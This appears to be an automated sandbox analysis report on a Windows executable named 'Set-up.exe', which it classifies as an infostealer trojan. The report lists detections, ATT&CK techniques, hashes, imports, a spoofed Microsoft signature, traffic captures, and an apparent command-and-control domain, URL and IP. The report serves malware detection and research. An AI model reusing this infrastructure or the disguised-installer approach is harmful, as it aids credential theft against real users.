    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0014A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,0_2_0014A550
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001DAA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,0_2_001DAA30
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0015E480 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,0_2_0015E480
    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
    | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
    | Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 231 Security Software Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
    | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
    | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 12 Process Discovery | Distributed Component Object Model | Input Capture | 15 Application Layer Protocol | Traffic Duplication | Data Destruction |
    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
    | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 17 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
    | Source | Detection | Scanner | Label | Link |
    |---|---|---|---|---|
    | Set-up.exe | 33% | Virustotal | | Browse |
    | Set-up.exe | 29% | ReversingLabs | Win32.Infostealer.Tinba | |

    No Antivirus matches
    | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
    |---|---|---|---|---|---|
    | home.thirttj13vs.top | 34.147.147.173 | true | false | | high |
    | httpbin.org | 50.19.58.113 | true | false | | high |

    | Name | Malicious | Antivirus Detection | Reputation |
    |---|---|---|---|
    | http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767 | true | Avira URL Cloud: safe | unknown |
    | thirttj13vs.top | true | Avira URL Cloud: safe | unknown |
    | home.thirttj13vs.top | true | Avira URL Cloud: safe | unknown |
    | https://httpbin.org/ip | false | | high |
    | http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argument=0 | true | Avira URL Cloud: safe | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | Set-up.exe | false | | high
http://html4/loose.dtd | Set-up.exe | false | | high
https://curl.se/docs/alt-svc.html# | Set-up.exe | false | | high
https://httpbin.org/ipbefore | Set-up.exe | false | | high
https://curl.se/docs/http-cookies.html | Set-up.exe | false | | high
https://curl.se/docs/hsts.html# | Set-up.exe | false | | high
http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi17361387675a1 | Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi67 | Set-up.exe | false | Avira URL Cloud: safe | unknown
http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767http://home.thirttj13vs.top/gbVspuhpvozlyd | Set-up.exe, 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argument=0S | Set-up.exe, 00000000.00000002.1768172601.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766598511.000000000158D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766788259.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766966328.0000000001591000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | Set-up.exe | false | | high
http://.css | Set-up.exe | false | | high
http://.jpg | Set-up.exe | false | | high
http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argu | Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767963 | Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
34.147.147.173 | home.thirttj13vs.top | United States | | 2686 | ATGS-MMD-ASUS | false
50.19.58.113 | httpbin.org | United States | | 14618 | AMAZON-AESUS | false
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1584736
                            Start date and time:2025-01-06 12:14:07 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 43s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Set-up.exe
                            Detection:MAL
                            Classification:mal84.troj.spyw.evad.winEXE@1/0@9/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 78%
                            • Number of executed functions: 51
                            • Number of non-executed functions: 147
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): SIHClient.exe
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                              Entropy (8bit):6.142440388231851
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.53%
                              • InstallShield setup (43055/19) 0.43%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:Set-up.exe
                              File size:7'745'160 bytes
                              MD5:82f12257874f42d2f2475ca1d9189e43
                              SHA1:24e0e7493e9bcc17d4858f350c6a6694f4a5acc5
                              SHA256:b75aaedf296ec3b596c58573077667f403ed73b18ec052ed9b68b21414671a72
                              SHA512:4398246584471c2158002b20c396c9ec4b9a842d2eb39acb1f4685ffc2644b54217bc1732f0d6b2cbbb6e7ef59ab823140f8b4f2c73b4874edd6d30274fc7e8d
                              SSDEEP:49152:wDQO2+6/4+mlIgcM/klYv3icaIBsgPkJGSlfMjluWwKWghT5yj+xK4buwPyz8Dlq:wDyG+mcM8kycpBLPSGGMjfdK+yz8E
                              TLSH:36762762EE8741F9DAC305715156B37F7E30AF009829CEB6DE90FB34D672A11E91E218
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a{g...............(..R..$v..2............R...@...........................v.....X.v...@... ............................
                              Icon Hash:90cececece8e8eb0
                              Entrypoint:0x4014a0
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x677B61F3 [Mon Jan 6 04:54:11 2025 UTC]
                              TLS Callbacks:0x7890e0, 0x789090
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:51b39aff649af7abc30a06f2362db069
                              Signature Valid:false
                              Signature Issuer:CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
                              Signature Validation Error:A certificate chain could not be built to a trusted root authority
                              Error Number:-2146762486
                              Not Before, Not After
                              • 26/08/2024 17:01:06 21/08/2025 17:01:06
                              Subject Chain
                              • CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
                              Version:3
                              Thumbprint MD5:3396EFFCA7AAE6A8A1361318EB7496FF
                              Thumbprint SHA-1:955613CC5723CCAB945D4A2F7F7C15D457ECDC54
                              Thumbprint SHA-256:F4E34A654907F496BEBC17BE075B41F51E416CDF202D64AA1E93D993C6487263
                              Serial:33009F7B734DB0480411EB0BBA0000009F7B73
                              Instruction
                              mov dword ptr [00B2E658h], 00000001h
                              jmp 00007F755C7FB276h
                              nop
                              mov dword ptr [00B2E658h], 00000000h
                              jmp 00007F755C7FB266h
                              nop
                              sub esp, 1Ch
                              mov eax, dword ptr [esp+20h]
                              mov dword ptr [esp], eax
                              call 00007F755CB82AD6h
                              cmp eax, 01h
                              sbb eax, eax
                              add esp, 1Ch
                              ret
                              nop
                              nop
                              nop
                              nop
                              nop
                              nop
                              nop
                              nop
                              push ebp
                              mov ebp, esp
                              push edi
                              push esi
                              push ebx
                              sub esp, 1Ch
                              mov dword ptr [esp], 009D5000h
                              call dword ptr [00B309A8h]
                              sub esp, 04h
                              test eax, eax
                              je 00007F755C7FB635h
                              mov ebx, eax
                              mov dword ptr [esp], 009D5000h
                              call dword ptr [00B30A1Ch]
                              mov edi, dword ptr [00B309BCh]
                              sub esp, 04h
                              mov dword ptr [00B2C028h], eax
                              mov dword ptr [esp+04h], 009D5013h
                              mov dword ptr [esp], ebx
                              call edi
                              sub esp, 08h
                              mov esi, eax
                              mov dword ptr [esp+04h], 009D5029h
                              mov dword ptr [esp], ebx
                              call edi
                              sub esp, 08h
                              mov dword ptr [0092C004h], eax
                              test esi, esi
                              je 00007F755C7FB5D3h
                              mov dword ptr [esp+04h], 00B2C02Ch
                              mov dword ptr [esp], 00B27104h
                              call esi
                              mov dword ptr [esp], 00401580h
                              call 00007F755C7FB523h
                              lea esp, dword ptr [ebp-0Ch]
                              pop ebx
                              pop esi
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x730000 | 0x2dac | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x762800 | 0x688 | .reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x735000 | 0x34f84 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x71cca0 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x730814 | 0x620 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x52a6ac | 0x52a800 | baa43239fc496f1e552593148c585739 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x52c000 | 0xa8ee4 | 0xa9000 | e5144cd5a13323c364349ac7e504a291 | False | 0.03480665218195266 | dBase III DBT, version number 0, next free block index 10, 1st item "\200Hz" | 0.49021551938145835 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x5d5000 | 0x151ad8 | 0x151c00 | f72a467ea1d31a64b8b74faf1c3a80e9 | False | 0.42061074551258326 | data | 6.278649157996116 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram | 0x727000 | 0x4d64 | 0x4e00 | fedb9fd76b96a9860b646db0ac84ea18 | False | 0.3199619391025641 | data | 4.889705613516218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x72c000 | 0x3180 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x730000 | 0x2dac | 0x2e00 | f3bdd02b09559dde47d9f0bcb1c12fec | False | 0.3687160326086957 | data | 5.347168347257807 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x733000 | 0x30 | 0x200 | fe2a65d4187b984679c52ae93485940e | False | 0.0625 | data | 0.2233456448570176 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x734000 | 0x8 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x735000 | 0x34f84 | 0x35000 | ad3f2ccef971e35e4bf2169f7b4eb7f1 | False | 0.5023723098466981 | data | 6.661444090813991 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
ADVAPI32.dll | CryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
bcrypt.dll | BCryptGenRandom
CRYPT32.dll | CertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
GDI32.dll | BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
gdiplus.dll | GdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
IPHLPAPI.DLL | ConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
KERNEL32.dll | AcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
msvcrt.dll | __mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
ole32.dll | CreateStreamOnHGlobal
SHELL32.dll | SHGetKnownFolderPath
api-ms-win-crt-convert-l1-1-0.dll | atoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
api-ms-win-crt-environment-l1-1-0.dll | __p__environ, __p__wenviron, getenv
api-ms-win-crt-filesystem-l1-1-0.dll | _fstat64, _stat64, _unlink
api-ms-win-crt-heap-l1-1-0.dll | _set_new_mode, calloc, free, malloc, realloc
api-ms-win-crt-locale-l1-1-0.dll | setlocale
api-ms-win-crt-math-l1-1-0.dll | _fdopen
api-ms-win-crt-private-l1-1-0.dll | memchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
api-ms-win-crt-runtime-l1-1-0.dll | _set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
api-ms-win-crt-stdio-l1-1-0.dll | __acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
api-ms-win-crt-string-l1-1-0.dll | _strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
api-ms-win-crt-time-l1-1-0.dll | __daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
api-ms-win-crt-utility-l1-1-0.dll | _byteswap_uint64, bsearch, qsort, rand, srand
USER32.dll | CharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
WS2_32.dll | WSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Jan 6, 2025 12:15:02.031903028 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.079601049 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.079664946 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.127345085 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.127398968 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.175353050 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.175443888 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.223361969 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.223433971 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.275350094 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.275553942 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.323345900 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.323421955 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.371360064 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.371515989 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.379472017 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.379592896 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.384459019 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384469986 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384514093 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.384548903 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384558916 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384582043 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384592056 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384603024 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.384632111 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.384706974 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384716988 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384725094 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384754896 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.384784937 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.384789944 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384800911 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384856939 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.384896994 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384906054 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384943962 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.384951115 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.384973049 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.384989977 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.385008097 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.385016918 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.385051966 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.385066986 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.385102987 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.385103941 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.385143042 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.385154963 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.385185957 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.389367104 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389421940 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389432907 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.389467001 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389476061 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389480114 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.389530897 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.389558077 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389583111 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389695883 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.389724970 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389734030 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389744043 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389801025 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.389842987 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389853954 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389889002 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.389900923 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.389923096 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389935970 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.389981031 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.390001059 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.390011072 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.390052080 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.390063047 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.390093088 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.390098095 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.390105009 CET804973134.147.147.173192.168.2.4
                              Jan 6, 2025 12:15:02.390142918 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.390158892 CET4973180192.168.2.434.147.147.173
                              Jan 6, 2025 12:15:02.390176058 CET804973134.147.147.173192.168.2.4
